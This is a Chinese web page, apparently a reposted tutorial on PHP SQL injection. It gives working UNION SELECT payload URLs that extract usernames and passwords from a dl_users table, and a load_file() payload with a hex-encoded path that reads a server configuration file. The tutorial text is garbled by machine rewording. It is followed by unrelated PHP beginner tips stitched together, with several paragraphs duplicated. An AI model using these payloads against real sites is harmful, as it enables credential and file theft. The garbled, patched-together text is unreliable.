PHP网页编程之php注入3

你发奋努力，熟悉了安全方面的问题，然后又设计了一些程序，感觉还不错。   三：一些注入技能，良多都是团体发明哦
1.union select的技能
UNION 用于将多个 SELECT 语句的了局结合到一个了局集中。在 SELECT 中的 select_expression 局部列出的列必需具有一样的类型。第一个 SELECT 查询中利用的列名将作为了局集的列名前往。
但是有咱们可以用上面的办法来猜想列的类型，可是省去良多工夫
咱们先
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
图24
看看软件描写里写着3，作者里写着4，咱们就能够猜想3和4的地位是字符型的，咱们再看14后面的是下载次数，这就应当是int型的了，对吧。
好了，咱们依据这里来构建吧，估量username和password也是字符型的。
碰运气哦
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
如图25
哈哈，这类办法只需看看就能够也许猜到了。
2.load_file读写文件的技能
不晓得你有无发明过在咱们用load_file()读写php文件时不克不及在网页中显示。例如：
C:/apache/htdocs/site/lib/sql.inc.php 转化为16进制为：0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
咱们机关以下
http://localhost/site/display.php?id=
451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)
,4,5,6,7,8,9,10,11
如图26

发明在文章内容的中央原本该显示sql.inc.php的，可是却空空之，为什么呢？
咱们看看网页的源代码先
图27
哈哈，看看标志的中央，晕逝世，本来在这里啊，可是为何哩？
本来html中< >用于标注，哈哈，分明了吧！下次可得记得在哪里找哦。
  参加PHP开发学习，或许只是一次偶然的想法吧！只是想在走向社会之前体验、学习在一个公司或者说是项目团队之中如何去更有效的沟通、交流、共同合作，还有就是为毕业实习找工作增加伐码。

使用zendstdio 写代码的的时候，把tab 的缩进设置成4个空格是很有必要的

Ps：以上纯属原创，如有雷同，纯属巧合

小鸟是第一次发帖（我习惯潜水的(*^__^*) 嘻嘻……），有错误之处还请大家批评指正，另外，前些日子听人说有高手能用php写驱动程序，真是学无止境，人外有人，天外有天。

因为blog这样的可以让你接触更多要学的知识，可以接触用到类，模板，js ，ajax

为了以后维护的方便最好是代码上都加上注释，“予人方便，自己方便”。此外开发文档什么的最好都弄齐全。我觉得这是程序员必备的素质。虽然会消耗点很多的时间。但是确实是非常有必要的。

曾经犯过一个很低级的错误，我在文件命名的时候用了一个横线\\\\\\\'-\\\\\\\' 号，结果找了好几个小时的错误，事实是命名的时候 是不能用横线 \\\\\\\'-\\\\\\\' 的，应该用的是下划线  \\\\\\\'_\\\\\\\' ;

先学习php和mysql,还有css(html语言很简单)我认为现在的效果比以前的方法好。

对于懒惰的朋友，我推荐php的集成环境xampp或者是wamp。这两个软件安装方便，使用简单。但是我还是强烈建议自己动手搭建开发环境。

建数据库表的时候，int型要输入长度的，其实是个摆设的输入几位都没影响的，只要大于4就行，囧。

如果你已经到这种程度了，那么你已经可以做我的老师了。其实php也分很多的区域，

兴趣是最好的老师，百度是最好的词典。

我还是推荐用firefox ，配上firebug 插件调试js能省下不受时间。谷歌的浏览器最好也不少用，因为谷歌的大侠们实在是太天才啦，把一些原来的js代码加了一些特效。

这些中手常用的知识，当你把我说的这些关键字都可以熟练运用的时候，你可以选择自己

我还是强烈建议自己搭建php环境。因为在搭建的过程中你会遇到一些问题，通过搜索或是看php手册解决问题后，你会更加深刻的理解它们的工作原理，了解到php配置文件中的一些选项设置。

php里的数组为空的时候是不能拿来遍历的；（这个有点低级啊，不过我刚被这个边界问题墨迹了好长一会）

我还是强烈建议自己搭建php环境。因为在搭建的过程中你会遇到一些问题，通过搜索或是看php手册解决问题后，你会更加深刻的理解它们的工作原理，了解到php配置文件中的一些选项设置。

为了以后维护的方便最好是代码上都加上注释，“予人方便，自己方便”。此外开发文档什么的最好都弄齐全。我觉得这是程序员必备的素质。虽然会消耗点很多的时间。但是确实是非常有必要的。

有位前辈曾经跟我说过，phper 至少要掌握200个函数 编起程序来才能顺畅点，那些不熟悉的函数记不住也要一拿手册就能找到。所以建议新手们没事就看看php的手册（至少array函数和string函数是要记牢的）。